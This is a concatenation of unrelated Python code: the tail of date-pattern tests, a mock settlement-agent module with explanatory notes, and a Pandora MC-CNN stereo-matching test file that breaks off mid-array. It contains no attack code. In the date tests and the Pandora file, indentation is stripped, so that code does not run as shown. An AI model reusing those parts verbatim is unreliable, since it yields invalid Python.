assert not date_in_range(pattern, datetime(2016, 7, 14), now=date(2016, 7, 13))
@freeze_time("2016-07-13")
def test_today_no_now():
pattern = "== today"
assert date_in_range(pattern, date(2016, 7, 13))
assert not date_in_range(pattern, date(2016, 7, 14))
assert date_in_range(pattern, datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 14))
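The patterns exercised above are comma-separated conditions like `"year == 2016, month > 6, day != 1"`, where each condition compares a date field to an integer. A toy evaluator for just that subset (no `now`/`today` or exact-date forms; `simple_date_in_range` is an illustrative name, not datecond's API):

```python
import operator
from datetime import datetime

# Operator tokens mapped to their stdlib comparison functions.
_OPS = {
    "==": operator.eq, "!=": operator.ne,
    ">": operator.gt, "<": operator.lt,
    ">=": operator.ge, "<=": operator.le,
}


def simple_date_in_range(pattern, dt):
    # Every comma-separated condition must hold for the date to match.
    for cond in pattern.split(","):
        field, op, value = cond.split()
        if field == "weekday":
            attr = dt.weekday()        # Monday == 0
        elif field == "isoweekday":
            attr = dt.isoweekday()     # Monday == 1
        else:
            attr = getattr(dt, field)  # year / month / day
        if not _OPS[op](attr, int(value)):
            return False
    return True
```

This mirrors the all-conditions-must-hold semantics the multi-condition tests above assume.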
# mocks/mss_agent.py (caser789/jsettle, Apache-2.0)
import random
from model import const

_SETTLEMENT_CYCLES = [
    const.SettlementCycle.REALTIME,
    const.SettlementCycle.DAILY,
    const.SettlementCycle.WEEKLY,
    const.SettlementCycle.BIWEEKLY,
    const.SettlementCycle.MONTHLY,
]

_SETTLEMENT_TARGETS = [
    const.SettlementTarget.MERCHANT_HOST,
    const.SettlementTarget.MERCHANT,
    const.SettlementTarget.STORE,
]


class MSSAgent(object):
    """Mock MSS agent returning randomized settlement configuration."""

    def get_store_details(self, store_id):
        return {
            'settlement_cycle': random.choice(_SETTLEMENT_CYCLES),
            'settlement_id': random.randint(1, 100),
            'settle_to': random.choice(_SETTLEMENT_TARGETS),
        }

    def get_merchant_details(self, merchant_id):
        return {
            'settlement_cycle': random.choice(_SETTLEMENT_CYCLES),
            'settlement_id': random.randint(1, 100),
            'settle_to': random.choice(_SETTLEMENT_TARGETS),
        }

    def get_entity_info(self, service_id, entity_type, entity_id):
        return {
            'wallet_account_id': random.randint(1, 100),
            'settlement_cycle': random.choice(_SETTLEMENT_CYCLES),
            'settlement_target_type': random.choice(_SETTLEMENT_TARGETS),
            'settlement_target_id': random.randint(1, 100),
        }


mss_agent = MSSAgent()
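Because the agent draws from the module-level `random`, its output changes from run to run, which can make tests flaky. One option (a sketch, not part of jsettle; `SeededMSSAgent` and its string cycle names are illustrative) is to inject a seeded `random.Random` instance so mock data is reproducible:

```python
import random

CYCLES = ["REALTIME", "DAILY", "WEEKLY", "BIWEEKLY", "MONTHLY"]


class SeededMSSAgent:
    """Illustrative mock variant that takes an injectable RNG."""

    def __init__(self, rng=None):
        # A seeded random.Random yields the same sequence on every run.
        self.rng = rng or random.Random()

    def get_store_details(self, store_id):
        return {
            "settlement_cycle": self.rng.choice(CYCLES),
            "settlement_id": self.rng.randint(1, 100),
        }


# Two agents seeded identically produce identical mock data.
agent_a = SeededMSSAgent(random.Random(42))
agent_b = SeededMSSAgent(random.Random(42))
```

Dependency-injecting the RNG also lets a test substitute a fully deterministic fake when even a seeded sequence is too opaque.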
# tests/test_plugin.py (CNES/Pandora_plugin_mccnn, Apache-2.0)
] | 4 | 2021-07-21T12:48:09.000Z | 2022-03-25T07:31:31.000Z | #!/usr/bin/env python
# coding: utf8
#
# Copyright (c) 2021 Centre National d'Etudes Spatiales (CNES).
#
# This file is part of PANDORA
#
# https://github.com/CNES/Pandora_plugin_mccnn
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
This module contains functions to test Pandora + plugin_mc-cnn
"""
from tempfile import TemporaryDirectory
import unittest
import rasterio
import numpy as np
import xarray as xr
import pandora
from pandora import matching_cost
from pandora_plugin_mc_cnn.plugin_mc_cnn import MCCNN # pylint: disable=unused-import
# pylint: disable=unsubscriptable-object
class TestPlugin(unittest.TestCase):
"""
TestPlugin class allows to test Pandora + plugin_mc-cnn
"""
def setUp(self):
"""
Method called to prepare the test fixture
"""
self.disp_ref = rasterio.open("tests/image/disp_left.tif").read(1)
self.disp_sec = rasterio.open("tests/image/disp_right.tif").read(1)
@staticmethod
def error(data, gt, threshold, unknown_disparity=0):
"""
Percentage of bad pixels whose error is > threshold
"""
nb_row, nb_col = data.shape
nb_error = 0
for row in range(nb_row):
for col in range(nb_col):
if gt[row, col] != unknown_disparity:
if abs((data[row, col] + gt[row, col])) > threshold:
nb_error += 1
return nb_error / float(nb_row * nb_col)
def test_mc_cnn(self):
        """
Test Pandora + plugin_mc-cnn
"""
# Create temporary directory
with TemporaryDirectory() as tmp_dir:
pandora.main("tests/test_cfg_accurate.json", tmp_dir, verbose=False)
# Check the reference disparity map
if self.error(rasterio.open(tmp_dir + "/left_disparity.tif").read(1), self.disp_ref, 1) > 0.17:
raise AssertionError
# Check the secondary disparity map
if self.error(-1 * rasterio.open(tmp_dir + "/right_disparity.tif").read(1), self.disp_sec, 1) > 0.17:
raise AssertionError
@staticmethod
def test_invalidates_cost():
"""
Test the pipeline compute cost volume, and invalid cost with pandora function
"""
# ------------ Test the method with a reference mask ( secondary mask contains valid pixels ) ------------
# Mask convention
# cfg['image']['valid_pixels'] = 0
# cfg['image']['no_data'] = 1
# invalid_pixels all other values
data = np.zeros((13, 13), dtype=np.float64)
data += 0.1
mask = np.array(
(
[
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
),
dtype=np.int16,
)
left = xr.Dataset(
{"im": (["row", "col"], data), "msk": (["row", "col"], mask)},
coords={"row": np.arange(data.shape[0]), "col": np.arange(data.shape[1])},
)
left.attrs["valid_pixels"] = 0
left.attrs["no_data_mask"] = 1
left.attrs["crs"] = None
left.attrs["transform"] = None
data = np.zeros((13, 13), dtype=np.float64)
data += 0.1
# Secondary mask contains valid pixels
mask = np.zeros((13, 13), dtype=np.int16)
right = xr.Dataset(
{"im": (["row", "col"], data), "msk": (["row", "col"], mask)},
coords={"row": np.arange(data.shape[0]), "col": np.arange(data.shape[1])},
)
right.attrs["valid_pixels"] = 0
right.attrs["no_data_mask"] = 1
# Cost volume before invalidation, disparities = -1, 0, 1
cv_before_invali = np.array(
[
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, -1.0],
[-1.0, -1.0, -1.0],
[-1.0, -1.0, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, -1.0],
[-1.0, -1.0, -1.0],
[-1.0, -1.0, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, -1.0],
[-1.0, -1.0, -1.0],
[-1.0, -1.0, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
],
dtype=np.float32,
)
# Cost volume ground truth after invalidation
cv_ground_truth = np.array(
[
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[-1.0, -1.0, -1.0],
[-1.0, -1.0, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, -1.0],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, -1.0],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
],
dtype=np.float32,
)
matching_cost_ = matching_cost.AbstractMatchingCost(
**{
"matching_cost_method": "mc_cnn",
"window_size": 11,
"subpix": 1,
"mc_cnn_arch": "fast",
"model_path": "weights/mc_cnn_fast_mb_weights.pt",
}
)
cv = matching_cost_.compute_cost_volume(left, right, disp_min=-1, disp_max=1)
# Check if the calculated cost volume is equal to the ground truth (same shape and all elements equals)
np.testing.assert_array_equal(cv["cost_volume"].data, cv_before_invali)
# Masked cost volume with pandora function
matching_cost_.cv_masked(left, right, cv, -1, 1)
# Check if the calculated cost volume is equal to the ground truth (same shape and all elements equals)
np.testing.assert_array_equal(cv["cost_volume"].data, cv_ground_truth)
# ------------ Test the method with a secondary mask ( reference mask contains valid pixels ) ------------
# Mask convention
# cfg['image']['valid_pixels'] = 0
# cfg['image']['no_data'] = 1
# invalid_pixels all other values
data = np.zeros((13, 13), dtype=np.float64)
data += 0.1
# Reference mask contains valid pixels
mask = np.zeros((13, 13), dtype=np.int16)
left = xr.Dataset(
{"im": (["row", "col"], data), "msk": (["row", "col"], mask)},
coords={"row": np.arange(data.shape[0]), "col": np.arange(data.shape[1])},
)
left.attrs["valid_pixels"] = 0
left.attrs["no_data_mask"] = 1
left.attrs["crs"] = None
left.attrs["transform"] = None
data = np.zeros((13, 13), dtype=np.float64)
data += 0.1
mask = np.array(
(
[
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
),
dtype=np.int16,
)
right = xr.Dataset(
{"im": (["row", "col"], data), "msk": (["row", "col"], mask)},
coords={"row": np.arange(data.shape[0]), "col": np.arange(data.shape[1])},
)
right.attrs["valid_pixels"] = 0
right.attrs["no_data_mask"] = 1
# Cost volume before invalidation, disparities = -1, 0, 1
cv_before_invali = np.array(
[
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, -1.0],
[-1.0, -1.0, -1.0],
[-1.0, -1.0, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, -1.0],
[-1.0, -1.0, -1.0],
[-1.0, -1.0, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, -1.0, -1.0],
[-1.0, -1.0, -1.0],
[-1.0, -1.0, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
],
dtype=np.float32,
)
# Cost volume ground truth after invalidation
cv_ground_truth = np.array(
[
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan],
],
[
[np.nan, np.nan, np.nan],
